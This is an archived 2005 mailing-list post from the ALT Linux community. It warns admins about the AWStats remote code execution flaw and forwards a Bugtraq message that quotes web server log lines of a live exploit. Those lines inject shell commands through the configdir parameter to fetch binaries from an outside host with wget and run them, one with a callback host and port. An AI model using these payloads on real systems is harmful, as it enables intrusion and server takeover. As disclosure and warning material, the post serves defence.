From mboxrd@z Thu Jan  1 00:00:00 1970
Return-Path: <mike@fly.osdn.org.ua>
Date: Fri, 28 Jan 2005 11:25:08 +0200
From: Michael Shigorin <mike@osdn.org.ua>
To: community@altlinux.ru
Message-ID: <20050128092508.GR22364@osdn.org.ua>
Mail-Followup-To: community@altlinux.ru, support@altlinux.ru
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="dLXnlYbDJNCwF3YM"
Content-Disposition: inline
User-Agent: Mutt/1.4.2.1i
Cc: support@altlinux.ru
Subject: [Comm] UI: awstats trouble
X-BeenThere: community@altlinux.ru
X-Mailman-Version: 2.1.5
Precedence: list
Reply-To: community@altlinux.ru
List-Id: Mailing list for ALT Linux users <community.altlinux.ru>
List-Unsubscribe: <https://lists.altlinux.ru/mailman/listinfo/community>,
	<mailto:community-request@altlinux.ru?subject=unsubscribe>
List-Archive: <http://lists.altlinux.ru/pipermail/community>
List-Post: <mailto:community@altlinux.ru>
List-Help: <mailto:community-request@altlinux.ru?subject=help>
List-Subscribe: <https://lists.altlinux.ru/mailman/listinfo/community>,
	<mailto:community-request@altlinux.ru?subject=subscribe>
X-List-Received-Date: Fri, 28 Jan 2005 09:25:17 -0000
Archived-At: <http://lore.altlinux.org/community/20050128092508.GR22364@osdn.org.ua/>
List-Archive: <http://lore.altlinux.org/community/>
List-Post: <mailto:mandrake-russian@linuxteam.iplabs.ru>


--dLXnlYbDJNCwF3YM
Content-Type: multipart/mixed; boundary="Er1qpsOqk0l6oMce"
Content-Disposition: inline


--Er1qpsOqk0l6oMce
Content-Type: text/plain; charset=koi8-r
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

	=FA=C4=D2=C1=D7=D3=D4=D7=D5=CA=D4=C5.
=F0=CF=CC=D8=DA=CF=D7=C1=D4=C5=CC=D1=CD awstats =CE=C1=D3=D4=CF=D1=D4=C5=CC=
=D8=CE=CF =D2=C5=CB=CF=CD=C5=CE=C4=D5=C0 =DA=C1=C2=CC=CF=CB=C9=D2=CF=D7=C1=
=D4=D8
=C4=CF=D3=D4=D5=D0 =CB awstats.pl -- =D7=DE=C5=D2=C1=DB=CE=C5=C5 =D0=D2=C5=
=C4=D5=D0=D2=C5=D6=C4=C5=CE=C9=C5 =D7 bugtaq@
=D3=CF=CF=D4=D7=C5=D4=D3=D4=D7=D5=C5=D4 =D2=C5=C1=CC=D8=CE=CF=D3=D4=C9, =CE=
=CF=DE=D8=C0 =CE=C1 =CF=C4=CE=CF=CD =C9=DA =C8=CF=D3=D4=D1=DD=C9=C8=D3=D1 =
=D5 =CE=C1=D3
=D0=D2=CF=C5=CB=D4=CF=D7 =DC=D4=D5 =C4=D9=D2=CB=D5 =C9=D3=D0=CF=CC=D8=DA=CF=
=D7=C1=CC=C9 =C2=D2=C1=DA=C9=CC=D8=D3=CB=C9=C5 =CF=C2=C5=DA=D8=D1=CE=D9 =C4=
=CC=D1
=D0=CF=D7=C5=DB=C5=CE=C9=D1 =D3=D0=C1=CD-=D4=D2=CF=D1=CE=C1.

--=20
 ---- WBR, Michael Shigorin <mike@altlinux.ru>
  ------ Linux.Kiev http://www.linux.kiev.ua/

--Er1qpsOqk0l6oMce
Content-Type: message/rfc822
Content-Disposition: inline

Return-Path: <bugtraq-return-17844-mike=fly.osdn.org.ua@securityfocus.com>
X-Original-To: mike@fly.osdn.org.ua
Delivered-To: mike@fly.osdn.org.ua
Received: from [205.206.231.27] (outgoing.securityfocus.com [205.206.231.27])
	by fly.osdn.org.ua (Postfix) with ESMTP id DF4141C0CE25
	for <mike@fly.osdn.org.ua>; Thu, 27 Jan 2005 02:42:56 +0200 (EET)
Received: from no.name.available by [205.206.231.27]
	via smtpd (for [212.40.36.150] [212.40.36.150]) with ESMTP;
	Wed, 26 Jan 2005 16:42:56 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com
	[205.206.231.20]) by outgoing3.securityfocus.com (Postfix) with QMQP
	id 27D2323728F; Wed, 26 Jan 2005 16:14:40 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3685 invoked from network); 26 Jan 2005 12:59:54 -0000
Content-Type: text/plain;
  charset="iso-8859-1"
From: Delian Krustev <krustev@krustev.net>
To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com,
	security-alerts@linuxsecurity.com
Subject: Re: [ GLSA 200501-36 ] AWStats: Remote code execution
Date: Wed, 26 Jan 2005 20:31:51 +0200
User-Agent: KMail/1.4.3
References: <20050125201313.GA8733@tomservo.ne1.client2.attbi.c>
In-Reply-To: <20050125201313.GA8733@tomservo.ne1.client2.attbi.c>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200501262031.51944.krustev@krustev.net>
X-Spam: no; 0.00;
	GLSA:01 exploit:01 %00:01 yar:01 vulnerable:01 tmp:01 2005:96 166:96
	socket:04 538:95 554:95 U4:95 200:94 252:94 Jan:05 

There's an exploit in the wild. Here's what it does:

200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/aws=
tats.pl?configdir=3D|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/c=
gi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozi=
lla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/aws=
tats.pl?configdir=3D|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/d=
c;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "=
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

I don't have the time to investigate the "cgi" and "dc" binaries.
The "cgi" at least tries to daemonize and opens a TCP listening socket.
They also try to replace the index page on the vulnerable site.

--Er1qpsOqk0l6oMce--

--dLXnlYbDJNCwF3YM
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFB+gT0bsPDprYMm3IRAmsCAJ9pD83PuqT/iL1uNcOk7BM9FWCizwCfS2+X
ga4XhjLpSPDV8b53vwbeB70=
=dDF5
-----END PGP SIGNATURE-----

--dLXnlYbDJNCwF3YM--